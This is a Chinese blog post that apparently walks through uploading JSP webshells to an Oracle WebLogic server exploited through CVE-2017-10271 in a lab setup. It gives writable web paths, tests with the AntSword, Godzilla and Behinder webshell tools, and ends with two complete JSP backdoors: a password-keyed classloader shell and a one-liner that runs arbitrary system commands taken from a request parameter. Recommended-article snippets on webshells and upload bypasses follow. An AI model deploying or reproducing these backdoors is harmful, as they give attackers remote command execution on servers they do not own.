weblogic快速传jsp木马

最新推荐文章于 2024-05-30 07:27:36 发布
最新推荐文章于 2024-05-30 07:27:36 发布
阅读量1.7k 收藏 6
点赞数 3
分类专栏: webshell管理工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48776804/article/details/117879009
版权

weblogic快速传jsp木马


以CVE-2017-10271测试,遗憾的是冰蝎jsp无法成功,冰蝎更换版本之后成功

1 上传路径

绝对路径和访问路径
方式1

  • /root/Oracle/Middleware/wlserver_10.3/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/123.jsp
    在这里插入图片描述

  • http://192.168.3.133:7001/console/framework/skins/wlsconsole/images/123.jsp
    在这里插入图片描述

方式2

  • /root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/uddiexplorer/123/test.jsp

  • http://...:7001/uddiexplorer/shell.jsp
    没有uddiexplorer,此路不通
    在这里插入图片描述

方式3

  • /root/Oracle/Middleware/user_projects/domains/application/servers/AdminServer/tmp/_WL_user/项目名/随机字符/war/shell.jsp
  • http://...:7001/项目名/shell.jsp
    没有application,此路不通
    在这里插入图片描述

2 上传方式

(1)测试支持jsp

利用这里的shell上传测试
/root/Oracle/Middleware/wlserver_10.3/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/test.jsp

<% out.print(“test”); %>
在这里插入图片描述
查看对应目录
ls /root/Oracle/Middleware/wlserver_10.3/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/

在这里插入图片描述
访问,证明支持jsp
http://192.168.3.133:7001/console/framework/skins/wlsconsole/images/test.jsp
在这里插入图片描述

(2)蚁剑

之前同样的方法
在这里插入图片描述

在这里插入图片描述

(3)哥斯拉

哥斯拉可以自己生成jsp马,使用之前的方法上传

在这里插入图片描述
默认生成的就是jsp马
在这里插入图片描述
在这里插入图片描述

(4)一句话

上传文末的jsp一句话
在这里插入图片描述
http://192.168.3.133:7001/console/framework/skins/wlsconsole/images/yijuhua.jsp
在这里插入图片描述

(5)冰蝎

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3 甜点

  • 不支持的情况,写了一个php马,直接回显出来
    在这里插入图片描述

  • 蚁剑jsp马,密码passwd

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>
  • 一句话jsp
<%
     if("123".equals(request.getParameter("pwd"))){
         java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
         }
        out.print("</pre>");
    }
%>
  • 参考链接
    https://blog.csdn.net/weixin_30883311/article/details/99261700
wx_7782175678
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件上之Webshell连接方法
saber的博客
04-19 5742
Webshell就是以asp.php.jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称为一种网页木马后门,攻击者可以通过这种网页后门获得网站服务器操作权限,控制网站服务器以进行上下载文件, 查看数据库执行命令 通过服务器开放的端口获取服务器的某些权限。往目标网站中上一句话木马,然后你就可以在本地通过Shell管理工具连接即可获取和控制整个网站目录。
JSP--文件上
weixin_65089091的博客
06-06 227
JSP--文件上
java安全——jsp一句话木马
最新发布
Innocence_0的博客
05-30 590
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~不会回显执行的结果只能在后台打印一个地址,常用来反弹shell。如果你对网络安全入门感兴趣,那么你需要的话可以。④50份安全攻防面试指南。⑨历年CTF夺旗赛题解析。③安全攻防357页笔记。⑥HW护网行动经验总结。⑦100个漏洞实战案例。⑤安全红队渗透工具包。
文件上漏洞类型汇总(详细)
彼岸花苏陌的博客
11-10 5687
文件上漏洞类型汇总 1.无限制: (1)直接用1.php放一句话木马 2.绕过前端: (1)Javascript绕过: 浏览器设置中选择禁用javascript即可 (2)抓包修改: burpsuite抓包后修改filename 3.绕过服务端: (1)黑名单绕过: 例如:不允许php,jsp文件上,则使用1.php3,1.php5等上 (2)白名单绕过: 例如:允许图片只允许jpg,则抓包改后缀改php为jpg (3)MIME绕过: MIME通过通过检查http包的Conte
CVE-2019-2725复现(从环境搭建到getshell)
1stPeak's Blog
07-16 6276
前言 今天复现CVE-2019-2725时从环境搭建到getshell,这一篇文章是我测试之后总结的一次完整的复现测试流程,供大家参考,如有不足,欢迎指正。 漏洞描述 Oracle WebLogic Server反序列化漏洞 ,该远程代码执行漏洞无需身份验证即可远程利用,即无需用户名和密码即可通过网络利用。 影响版本 Oracle WebLogic Server,版本 10.3.6.0、12.1.3.0 测试环境准备 注:我这里主要介绍linux下weblogic的搭建 1、Ubuntu 我用的ubuntu
Web木马与文件上漏洞
weixin_62707591的博客
06-20 2773
目录 一、认识Web木马 1.1 木马概念 1.2 web木马危害 1.2.1 攻击者留后门 1.2.2 文件、数据库操作 1.2.3 修改web页面 1.3 Web 木马特点 1.3.1Web木马可大可小 1.3.2 无法有效隐藏 1.3.3 具有明显特征值 1.3.4 必须为可执行的网页格式: 1.4 Web木马分类 1.4.1 一句话木马 1.4.2 大 二、初识文件上漏洞 2.1 文件上漏洞的概念 2.2 文件上漏洞的危害 2.2.1 非授权用户的越
【每日渗透笔记】文件上绕过尝试
10-27 3989
【文件上】白名单
WebLogic8.1 调试JSP
05-26
放到Web/web-inf下, 可以使用jsp的断点调试
Myeclipse+weblogic断点调试jsp.pdf
10-14
对于使用Myeclipse集成开发环境和Weblogic应用服务器的开发者来说,能够熟练地进行JSP和Java代码的断点调试是提高工作效率的重要技能。本文将详细介绍如何在Myeclipse中利用Weblogic中间件进行断点调试。 首先,...
WebLogic平台下部署Servlet与Jsp
03-06
学会在WebLogic平台下部署Servlet与Jsp 二、实验环境 Windows XP 三、实验内容: 1、Weblogic Server的安装和Weblogic管理控制台 1)Weblogic安装 从服务器上下载server813_win32.exe安装 2)创建自己的工作区 ...
基于weblogicjsp预编译代码示例
10-23
在Java Web开发中,WebLogic Server是一款非常流行的Java EE应用服务器,它提供了全面的企业级服务,包括对JSP(JavaServer Pages)的支持。本示例主要关注如何在WebLogic环境中进行JSP的预编译,这有助于提升应用...
jsp网上书店源码weblogic
03-27
jsp网上书店源码weblogic】是一个基于JSP(JavaServer Pages)技术的网上书店项目,结合了WebLogic服务器和XML(eXtensible Markup Language)进行应用部署和配置。这个项目展示了如何利用JSP来构建动态网页,实现...
文件上漏洞详解
weixin_72940775的博客
03-26 532
对文件上漏洞的解释与实例展示
Jsp挖掘(7)-JSP漏洞
thelostworld
05-11 3042
JSP漏洞 一、上漏洞成因文件上过程中,通常因为未校验上传文件后缀类型,导致用户可上jsp等一些webshell文件。代码审计时可重点关注对上传文件类型是否有足够安全的校验,以及是否限制文件大小等。解决的方法:主要是限制文件的后缀名的校验,还有限制文件的大小文件上漏洞的攻击与防御方式https://www.jianshu.com/p/5ebba04829801.前端限制(文件类型的验证)主要是前端的文件名的检查这个一般很好的绕过1.burp suite 绕过,抓包后面再修改文件的类型的后缀名2.
weblogic81的服务配置
weixin_30784501的博客
10-16 179
weblogic81的服务配置使用给weblogic6.1的朋友都知道,weblogic61不用自己新建webservice,而wl81必须新建自己的webservice。其基本的建立步骤为: l1。启动WebLogic8.1的Configuration Wizard,新建一个 weblogic...
利用无参数的RCE注入写一个一句话木马
qq_51553814的博客
10-22 3379
昨天做了一个无参数注入RCE的题,学到后面发现还可以直接用RCE写一个一句话木马进去 今天来总结一下 以下是源码 <?php header("content-type:text/html;charset=utf-8"); if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } else { echo "error"; } highlight_file
文件上漏洞
qq_56289291的博客
07-26 1815
上传文件时,如果未对上的文件进行严格的验证和过滤,就容易造成文件上漏洞,上脚本文件(包括asp、aspx、jsp、php等)
服务器被上jsp木马
u013894638的博客
08-25 1475
有个老项目最近安全监测比较严,又双叒叕接到经理的任务,说某项目的图片文件夹里多了两个木马,让找下原因和更改办法。 吧木马代码复制一段放到百度搜一下,大多指向strut2漏洞,但查看了项目jar包都已经改成2.3.15.1了应该不存在漏洞问题, 然后在360网站进行认领监测得了98分,没有检测出漏洞问题(此刻对360的能力失去了信心),然后就找漏洞工具测啊测, 也没测出个因为所以。最后查看木马
jsp一句话木马_图片木马解析
weixin_39965881的博客
11-21 4406
PHP图片木马 实现运行环境介绍本测试主要针对的是 IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的 在默认Fast-CGI开启状况下,黑阔上一个名字为wooyun.jpg,内容为...
weblogic nginx
01-10
WebLogic和Nginx是两种常用的网络服务器软件。 WebLogic是由Oracle开发的Java应用服务器,用于部署和管理企业级Java应用程序。它提供了一个强大的、可靠的平台,用于开发、测试和部署Java EE(Java Enterprise Edition)应用程序。WebLogic支持广泛的Java EE技术和规范,包括EJB(Enterprise JavaBeans)、JSP(JavaServer Pages)、Servlets、JMS(Java Message Service)和JDBC(Java Database Connectivity)等。它还提供了可靠性、弹性和可伸缩性,以满足大型企业环境中的高负载和高可用性需求。 Nginx是一个开源的高性能Web服务器和反向代理服务器。它主要用于提供静态资源的高速访问和反向代理,同时也支持负载均衡、SSL/TLS终止、HTTP缓存、HTTP视频流和分布式缓存等功能。Nginx通常用作Web服务器的前端,将客户端请求转发给后端的应用服务器。它具有轻量级、高并发处理能力和低内存消耗的特点,适用于高流量和高负载环境。 在一些大型企业的架构中,WebLogic和Nginx可以同时部署在一个系统中,互相配合使用。Nginx作为Web服务器的前端,负责处理静态资源的请求和负载均衡的功能,将动态请求转发给后端的WebLogic服务器进行处理。这样可以充分利用Nginx的高性能和轻量级特点,并通过WebLogic的强大功能和企业级支持来处理Java应用程序的请求。 总结起来,WebLogic和Nginx是两种在不同领域中都非常有用的网络服务器软件。WebLogic适用于部署和管理Java企业级应用程序,而Nginx则适用于处理高性能和负载均衡的静态资源和动态请求。将它们结合使用可以提高系统的性能和可伸缩性,满足不同场景下的需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值